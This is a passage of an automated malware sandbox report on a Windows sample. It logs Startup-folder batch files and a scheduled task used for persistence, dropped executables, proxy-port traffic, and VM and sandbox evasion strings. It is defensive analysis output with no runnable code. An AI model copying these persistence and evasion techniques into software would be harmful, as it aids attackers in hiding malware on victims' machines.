                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5MU2eoXrXWjMqtCDgcUdxEXh.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cXcTyLUx7TcAqwa1PaqAe42l.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bKbfQedsHp5fPnIwSbgAXTGS.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mIfCnFQFL1iakCTbZHUvqqRQ.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FYS7ZbtfMHg45nrX4x6uzB9u.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RhOTMLiWYdQ5cM559FjqYdxz.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NWqXzpae1NGiof3fGaSCKwbn.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cPDXi3YsHb2JKplcNt2ulL4v.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\11FhgNaI9OC9CIBuozAEgUpl.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F4MKwilBLbDn1AvI4NJYim3J.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cgfjpHdWrKt7RBbVJLVt3KrQ.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Qeq8y82NFzxmb0C1zqsQ9GIJ.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PSzSTrBAfql6s2xHwMaulb6g.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RVMSz0xyVTk828VJXeNNyJ5X.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OUfj0Cjc8tUmuX1EJn2UDMRq.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iFau6s6nP0Npku3mzBCNvuor.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xEGgxKMHj9iJfbRcoMlSL4NY.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I0bhPTX30r8P4G1lvu8sFzoW.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MGSlOhBcAWKEdyehvoNbVoUR.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kiXcuJUJS97MOwYXLopyQBva.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hx6FJnbZibFTuzR4KP9Slo6z.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C7JK1QLd1HhpC2iu6FzaXx9e.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7lSYLKWCafZpx18kXQ49864p.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tP1HwHnBrmkAp5HYbvKx3soV.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V1FiUldszCzLAulbMss25ZN5.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\26fF1twXUUy7jGhqLx9vrwoW.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EQSWALPGSJbmdhZ5UXJP52TV.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6gL1gG7ldW7PoVRDY8vKo5tc.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7brphmKFPcG9dvFk5ljwDtYq.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5wXkSqn4DIUtGScxeGbdZDl0.batJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeFile created: C:\Windows\Tasks\88e931437f4fbe2c.job
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                  Hooking and other Techniques for Hiding and Protection

                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 10647
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 8118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 12457
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 26927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 5088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 64579
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 10647
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 22538
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8118 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 8123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 51513
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 9001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 7732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 41890
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 8989
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 41274
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 9080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 27294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 12457
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51460 -> 43435
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51639 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51624 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51681 -> 9005
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51659 -> 29249
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51745 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51746 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51607 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50986 -> 5443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51696 -> 10000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51675 -> 8197
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51651 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51726 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 6002 -> 51308
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51653 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51762 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51730 -> 18080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51613 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51783 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50708 -> 27898
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50729 -> 25847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51188 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51748 -> 5039
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51668 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51804 -> 64943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51806 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51811 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51739 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51793 -> 10046
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51800 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 26927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51827 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51785 -> 6009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51155 -> 82
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51813 -> 8193
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51824 -> 57728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51799 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51808 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51829 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51137 -> 82
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50862 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 51323
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51667 -> 14076
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51831 -> 10089
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50874 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51812 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51823 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51580 -> 31785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51578
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50905 -> 57377
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51509
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51002 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51351 -> 11201
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50691 -> 16892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49983
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51071 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50926 -> 33382
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51837 -> 8800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50936 -> 62289
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 50789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50974 -> 38772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51012 -> 31654
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51640 -> 50704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51721 -> 8595
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51689 -> 32210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 22538
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50524 -> 16379
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_00416240 GetProcAddress (repeated), LoadLibraryA (repeated), GetProcAddress (repeated)
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_12-7527)
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIES
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory allocated: 1EBAAD60000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory allocated: 1EBC4770000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 1600000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2FE0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 4FE0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 8630000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 9630000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 9800000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: A800000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: B2A0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: D260000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: E940000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
